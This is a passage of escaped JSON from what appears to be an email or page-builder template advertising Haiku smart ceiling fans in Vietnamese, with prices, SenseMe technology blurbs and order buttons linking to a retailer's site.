:\\\"u_content_image_16\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"wFNlCgf6SA\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_18\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HAIKU I SERIES<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"T0Wi7WLJ19\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_19\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>HAIKU WH\\/BL 60\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"84LxsaDyDU\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_20\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">36.9 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup><span style=\\\\\\\"line-height: 12px;\\\\\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">31.5 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"jHZ3ZDXmb_\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cao-cap-haiku-i-60inch-mau-den.html\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_14\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_34\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_24\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"h2d6KUlkns\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"f6A4my_Pms\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VdDHPWt0iP\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"12px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_10\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"hE75zgOYYF\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"pRAkwR5iCb\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AG1wZls3cI\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"q53kjy0Fbp\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"kXlgdO_sPN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"z5SNU6N6JW\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_21\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 20px; line-height: 28px;\\\\\\\">KH\\u00d4NG CH\\u1ec8 M\\u00c1T - M\\u00c0 C\\u00d2N H\\u01a0N TH\\u1ebe N\\u1eeeA ?<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ypX1LDDnWm\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ecf0f1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_26\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">C\\u00d4NG NGH\\u1ec6 SENSEME\\u2122<br \\/>B\\u1ed9 n\\u00e3o \\u0111\\u1eb1ng sau nh\\u1eefng chi\\u1ebfc qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh nh\\u1ea5t th\\u1ebf gi\\u1edbi, c\\u00f4ng ngh\\u1ec7 SenseMe\\u2122 \\u0111\\u01b0\\u1ee3c c\\u1ea5p b\\u1eb1ng s\\u00e1ng ch\\u1ebf, gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i t\\u1eeb m\\u1ecdi g\\u00f3c \\u0111\\u1ed9 s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"SQpFTgzFHB\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/bai-viet\\/senseme\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"20px 30px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM C\\u00d4NG NGH\\u00ca SENSEME<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":279,\\\"calculatedHeight\\\":57}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#ef0d33\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"R_AV9AZjR_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"LO80TmK1uI\\\",\\\"contents\\\":[{\\\"id\\\":\\\"plSJG4Z-kl\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_19\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_14\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"asWld2pGJl\\\",\\\"cells\\\":[49.83,50.17],\\\"columns\\\":[{\\\"id\\\":\\\"e-sogD6YwY\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UH__OC3KxN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 0px 0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HAIKU - SMART CEILING FANS<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"y9l55XPumV\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#1b2a2f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_16\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 22px; line-height: 30.8px;\\\\\\\"><strong>THI\\u1ebeT K\\u1ebe TH\\u1ee6 C\\u00d4NG<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"EcccuM4Uwh\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontSize\\\":\\\"13px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_2\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe THI\\u1ebeT K\\u1ebe T\\u1eeaNG KH\\u00d4NG GIAN<\\/strong>\\\"}},{\\\"id\\\":\\\"6CEH_UVsP-\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#0e0f13\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_22\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">Haiku v\\u1edbi thi\\u1ebft k\\u1ebf chuy\\u00ean nghi\\u1ec7p ki\\u1ec3m so\\u00e1t hi\\u1ec7u qu\\u1ea3 ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n \\u1edf m\\u1ee9c t\\u1ed1i \\u01b0u t\\u1eebng v\\u00f2ng quay th\\u00f4ng qua c\\u00f4ng ngh\\u1ec7 c\\u1ea3m bi\\u1ebfn\\u00a0<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"uPKyGk_-mK\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 14px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_9\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":109,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_15\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"fsD97o3vAj\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Xq0WFxLUHL\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764909825-haiku_caramel_bamboo.jpg\\\",\\\"width\\\":640,\\\"height\\\":426},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_16\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_11\\\",\\\"htmlClassNames\\\